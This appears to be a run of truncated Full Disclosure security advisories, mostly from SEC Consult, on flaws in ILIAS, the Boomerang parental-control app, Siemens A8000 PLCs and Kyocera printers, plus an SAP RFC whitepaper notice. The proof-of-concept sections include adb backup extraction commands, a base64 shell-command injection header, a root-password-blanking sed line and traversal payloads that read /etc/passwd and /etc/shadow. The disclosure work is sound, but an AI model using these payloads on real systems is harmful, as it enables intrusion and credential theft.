enumeration of the ServiceNow GQL database, including read access to the `sys_user_session` and `sys_user_token` tables, which provide the necessary information to generate valid `glide_user_activity` and `glide_session_store` cookies, and the X-Usertoken header to allow privilege escalation to any previously authenticated user. 4. Information A blog writeup detailing the vulnerablties and issues aswell as a proof of concept can be accessed at https://x64.sh/posts/ServiceNow-Insecure-access-control-to-admin/ 5. Remediation ServiceNow has released patches and an upgrade that address an Access Control List (ACL) bypass issue in ServiceNow Core functionality. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] SEC Consult SA-20230627-0 :: Multiple high risk vulnerabilities in ILIAS eLearning platform
SEC Consult Vulnerability Lab Security Advisory < 20230627-0 >
===
title: Multiple high risk vulnerabilities
product: ILIAS eLearning platform
vulnerable version: see section "Vulnerable version" below
fixed version: see section "Solution" below
CVE number: -
impact: High
homepage: https://www.ilias.de
found: 2022-12-28
by: Armin Stock (Atos)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
===
Vendor description:
---
"Around since 1998, ILIAS is a powerful learning management system that fulfills
all your requirements. Using its integrated tools, small and large businesses,
universities, schools and public authorities are able to create tailored,
individual learning scenarios."
Source: https://www.ilias.de/en/
Business recommendation:
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends to perform a thorough security review of the
product
conducted by security professionals to identify and resolve potential further
security issues.
Vulnerability overview/description:
---
1) Authenticated remote code execution (ilObjRoleGUI)
The function `changeExistingObjectsObject` of the class `ilObjRoleGUI` passes
user-controlled data to the `unserialize` function.
---
# FILE: Services/AccessControl/classes/class.ilObjRoleGUI.php
/**
* Change existing objects
* @return
*/
protected function changeExistingObjectsObject()
{
global $DIC;
$tree = $DIC['tree'];
$rbacreview = $DIC['rbacreview'];
$rbacadmin = $DIC['rbacadmin'];
$mode = (int) $_POST['mode'];
$start = ($this->obj_ref_id == ROLE_FOLDER_ID ? ROOT_FOLDER_ID :
$this->obj_ref_id);
$this->object->changeExistingObjects($start, $mode,
unserialize(ilUtil::stripSlashes($_POST['type_filter'])));
ilUtil::sendSuccess($this->lng->txt('settings_saved'), true);
$this->ctrl->redirect($this, 'perm');
}
---
The user-controlled `POST` parameter `type_filter` is passed to the
`unserialize` function. The function `ilUtil::stripSlashes` only tries to
protect against `HTML injection` and does not interfere with the serialized
payload.
To be able to exploit this vulnerability it is required to have
`edit_permission`
on an object, which supports the `ilPermissionGUI` command and has a `ref_id`.
Also an `obj_id` of a role is required. As an example the `course` object is
used.
---
# FILE: Services/AccessControl/classes/class.ilPermissionGUI.php
public function executeCommand()
{
global $DIC;
$rbacsystem = $DIC['rbacsystem'];
$ilErr = $DIC['ilErr'];
if (!$rbacsystem->checkAccess("edit_permission",
$this->gui_obj->object->getRefId())) {
$ilErr->raiseError($this->lng->txt("permission_denied"),
$ilErr->MESSAGE);
}
$next_class = $this->ctrl->getNextClass($this);
switch ($next_class) {
case "ilobjrolegui":
$this->ctrl->setReturn($this, 'perm');
include_once("Services/AccessControl/classes/class.ilObjRoleGUI.php");
$this->gui_obj = new ilObjRoleGUI("", (int) $_GET["obj_id"],
false, false);
$ret = $this->ctrl->forwardCommand($this->gui_obj);
break;
---
2) ilUtil::renameExecutables bypass allows PHP code execution
The ILIAS platform uses the function `ilUtils::renameExecutables` in the
`ilFileSystemGUI` class (used to upload or unzip files for various objects), to
prevent the upload of executable files like `.php`.
# File: ILIAS-7.17\Services\FileSystem\classes\class.ilFileSystemGUI.php
/**
* delete object file
*/
public function unzipFile($a_file = null)
{
# ...
if (@is_file($a_file)) {
include_once("./Services/Utilities/classes/class.ilFileUtils.php");
$cur_files = array_keys(ilUtil::getDir($cur_dir));
$cur_files_r = iterator_to_array(new RecursiveIteratorIterator(new
RecursiveDirectoryIterator($cur_dir)));
if ($this->getAllowDirectories()) {
ilUtil::unzip($a_file, true);
} else {
ilUtil::unzip($a_file, true, true);
}
# ...
}
# Call to renameExecutables, after a ZIP file has be unzipped
i
[FD] SEC Consult SA-20230628-0 :: Stored XSS & Privilege Escalation in Boomerang Parental Control App
SEC Consult Vulnerability Lab Security Advisory < 20230628-0 >
===
title: Stored XSS & Privilege Escalation
product: Boomerang Parental Control App
vulnerable version: <13.83
fixed version: >=13.83 (only issue 1), rest not fixed
CVE number: CVE-2023-36620, CVE-2023-36621
impact: High
homepage: https://nationaledtech.com
found: 2022-09-29
by: Fabian Densborn (Office Vienna)
Bernhard Gründling (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
===
Vendor description:
---
"National Education Technologies Inc. is a manufacturer of mobile
applications. Their portfolio ranges from parental control apps, to
safe browsing apps, to digital wellbeing apps."
Source: https://nationaledtech.com
Business recommendation:
The vendor only provides an update for one of the identified security issues,
but it effectively reduces the risk of some of the other vulnerabilities, which
are currently not fixed yet. The vendor could not provide a timeline when the
rest of the issues will be patched.
If possible, limit the possibility to boot into Android safe mode. Otherwise
children are always able to bypass any restrictions.
An in-depth security analysis performed by security professionals is
highly advised, to identify and resolve potential further critical security
issues.
Vulnerability overview/description:
---
1) ADB Backup allowed (CVE-2023-36620)
The app is missing the android:allowBackup="false" attribute in the
manifest which allows the user to backup the internal memory of the
app to a PC. This gives the user access to the device (in case ADB is enabled)
and API token which are used to authenticate requests to the API.
2) Stored XSS
The customizable name of the child's device can be used to trigger a XSS
payload in the parent web dashboard. Children might be able to attack
their parents' account.
3) Trigger parent control functions from child device (Privilege Escalation)
A device token in the form of a UUID is used as a session token for the parent
and the child device. The parent device token is leaked on an endpoint which
is accessible by the child, which is equivalent to leaking the session token.
This token can then be used to authenticate requests to the API and get the same
access rights as the parent. This would allow a child to bypass restrictions
and access device settings.
4) Disable Child App Restriction without Parent's notice (CVE-2023-36621)
The child can remove all restrictions temporarily or uninstall the application
without the parents noticing.
Proof of concept:
-
1) ADB Backup allowed (CVE-2023-36620)
The internals of the app can be backed up to a PC by connecting the device
and running the following commands. As a prerequisite, the ADB feature
must be enabled or being used via recovery. Children could bypass any Android
setting restrictions via vulnerability 3).
adb backup -apk com.nationaledtech.Boomerang
dd if=backup.ab bs=24 skip=1 | zlib-flate -uncompress | tar xf -
The internal data contains the device and API token which are used to
communicate with the API.
2) Stored XSS
As the internal memory including the device and API token is backup-able (see
1),
it is possible to construct arbitrary requests to the API in the name
of the child. The following payload can be used to change the device name
and trigger an alert box in the dashboard of the parent:
POST /services/DeviceService.svc/RenameDevice HTTP/1.1
Accept: application/json
Content-Type: application/json;charset=UTF-8
Content-Length: 1470
Host: app.useboomerang.com
{
"DeviceToken": ,
"ApiToken": ,
"DeviceTitle":"\"\/>",
"TargetDeviceToken":
}
3) Access parent control functions from child device (Privilege Escalation)
When visiting the Family Messenger Tab within the application on the device, a
GET
request to API endpoint `/services/FamilyService.svc/GetAllFamilyDevices` will
be
sent and the response contains all DeviceTokens associated with the account
(including the ones of parent devices).
To be able to query the `/services/FamilyService.svc/GetAllFamilyDevices`
endpoint an attacker first needs to backup their device and get access to their
own device
[FD] SEC Consult Vulnerability Lab Whitepaper: Everyone Knows SAP®, Everyone Uses SAP, Everyone Uses RFC, No One Knows RFC: From RFC to RCE 16 Years Later
SEC Consult Vulnerability Lab Whitepaper < 20230629-0 > === Title: Everyone Knows SAP®, Everyone Uses SAP, Everyone Uses RFC, No One Knows RFC: From RFC to RCE 16 Years Later Researcher: Fabian Hagg (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com === In an independent analysis on the server-side implementation of the proprietary Remote Function Call (RFC) interface in SAP NetWeaver Application Server ABAP and ABAP Platform (both hereinafter referred to as AS ABAP), a set of high-impact implementation bugs and design flaws were identified by SEC Consult Vulnerability Lab security researcher and SAP security expert Fabian Hagg. Technical details about the research results are presented during the annual Troopers Security Conference 2023 in Heidelberg, Germany. Remote Function Call (RFC) is a proprietary communication protocol required for all systems operating the SAP® Application Server for ABAP®, making it one of the most appealing targets for attacks on business-critical SAP system landscapes. With the talk ”Attacking the Giants: Exploiting SAP Internals” presented by M. Nunez at Black Hat Europe 2007, the protocol reached the security research community for the first time. Nowadays, SAP systems became increasingly interconnected not only internally, but also across network trust boundaries. This circumstance results in enterprises relying on the RFC interface technology and its codebase more than ever. The present paper reports on an independent analysis of the protocol as it is used in SAP NetWeaver® Application Server ABAP and ABAP Platform for server-to-server communication of type ’3’. By employing a hybrid security testing approach combining static and dynamic analysis techniques, the objective of this research in re-assessing the RFC attack surface yielded alternate logon material, cryptographic failures, memory corruptions, and ABAP programming pitfalls. This paper examines each of the identified vulnerabilities, demystifying somewhat forgotten inner workings of the protocol and key security mechanisms to highlight novel attack vectors and a wormable exploitation chain. Technical whitepaper: https://r.sec-consult.com/saprfcwhite Short blog post summary: https://r.sec-consult.com/saprfcblog TROOPERS23 conference page: https://troopers.de/troopers23/talks/n7yuqg/ ~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] SEC Consult SA-20230703-0 :: Multiple Vulnerabilities including Unauthenticated RCE in Siemens A8000
SEC Consult Vulnerability Lab Security Advisory < 20230703-0 > === title: Multiple Vulnerabilities including Unauthenticated RCE product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00) Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00) vulnerable version: <= V04.92 fixed version: CPCI85 V05 CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921 impact: Critical homepage: https://www.siemens.com found: 2023-02-15 by: Stefan Viehböck (Office Vienna) Christian Hager (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Gorazd Jank (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com === Vendor description: --- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or later version. (https://support.industry.siemens.com/cs/ww/en/view/109804985/) SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: --- 1) Unauthenticated Remote Code Execution (CVE-2023-28489) By sending an HTTP request with a crafted header to port 80/443 of the PLC, arbitrary commands can be executed as system user. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices. 2) Authenticated Command Injection (CVE-2023-33919) Due to missing server-side input sanitation, any user with access to the SICAM WEB interface can execute arbitrary commands as user "root" on the device. This works by setting malicious parameters and starting an Ethernet package capture. 3) Hard-coded Root Password (CVE-2023-33920) The PLC contains a hard-coded "root" user password hash. This password hash is the same on all devices. If the corresponding password is known, it could be used to login via UART and SSH. 4) Console Login via UART (CVE-2023-33921) The UART interface can be accessed with physical access to the PCB. After connecting to the interface, boot information is given and a login prompt is provided. Login as "root" user is possible after changing the hard-coded "root" password hash (see 1,2, and 3). Proof of concept: - 1) Unauthenticated Remote Code Execution (CVE-2023-28489) To exploit this vulnerability, an HTTP request including the command must be crafted. No "/" characters can be used, therefore commands are encoded as base64, e.g., "id" as "aWQ=". The command must be provided as UPLOADFILENAME header. A full command looks as follows: ;echo aWQ=| base64 -d | sh # The following header format must be obeyed: * User-Agent: SICAM TOOLBOX II * Session-ID: [ARBITRARY 16 CHARACTERS] * UPLOADFILENAME: [COMMAND] Additionally, the request body must contain the following POST parameters: * type=20 * length=[ARBITRARY] * data=[ARBITRARY] A valid request can be seen below: --- [ POC request removed ] --- If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as root user: --- base64: /ies/IN/_: No such file or directory uid=0(root) gid=0(root) --- Subsequently, the SSH port can be opened by sending the following commands separately and encoded as base64 string. They will replace the set default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall: --- sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCb
[FD] SEC Consult SA-20230705-0 :: Path traversal bypass & Denial of service in Kyocera TASKalfa 4053ci printer
SEC Consult Vulnerability Lab Security Advisory < 20230705-0 > === title: Path traversal bypass & Denial of service product: Kyocera TASKalfa 4053ci printer vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561 fixed version: 2VG_S000.002.574 CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261 impact: High homepage: https://global.kyocera.com found: 2022-12-13 by: Stefan Michlits (Office Vienna) Gorazd Jank (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com === Vendor description: --- "Kyocera Document Solutions is leading the digital shift driving productivity and growth in the printing industry. We offer a range of exciting new options that draw on the combined resources of the Kyocera Group." Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/ Business recommendation: SEC Consult recommends Kyocera customers to install the latest updates. Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected from other security issues. Vulnerability overview/description: --- 1) Path Traversal - Bypass (CVE-2023-34259) A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06. The previous exploit can be found at: https://www.exploit-db.com/exploits/48561 Kyocera has fixed the vulnerability. It was not possible to access arbitrary files using the public exploit. However, SEC Consult have found a bypass to exploit this vulnerability again and access arbitrary files. Due to the fact that the web service is running as the user root, it was possible to access all files (e.g. /etc/shadow) on the device. 2) Denial-of-Service - Web Interface (CVE-2023-34260) The denial-of-service vulnerability is related to the path traversal vulnerability. Instead of requesting a file, a directory will be requested. Once the request is sent to the web service running on TCP port 443, the web service will become unresponsive and must be restarted. 3) User Enumeration (CVE-2023-34261) The login function on the web service running on TCP port 443 is prone to a user enumeration vulnerability. The login function will return different responses, whether the username is valid or not. Proof of concept: - 1) Path Traversal - Bypass (CVE-2023-34259) Previously, a security researcher has discovered an unauthenticated directory traversal vulnerability in the web service running on port 443. The following payload was used to access arbitrary files: https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm This vulnerability is fixed in the current version. It was not possible to access arbitrary files using the above payload. However, the vulnerability was not fixed correctly. SEC Consult identified a bypass to exploit this vulnerability again. Once the ../ sequences will be URL encoded, it is possible to bypass the fix and access arbitrary files. The following payload can be used to access the file /etc/passwd: https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm The response containing the contents of the file /etc/passwd can be seen in the following paragraph. --- HTTP/1.1 200 OK Content-Length: 770 Accept-Encoding: identity Server: KM-MFP-http/V0.0.1 Content-Type: text/html X-Frame-Options: SAMEORIGIN root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false --- Also, it was possible to access the file /etc/shadow. The following payload can be used: https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
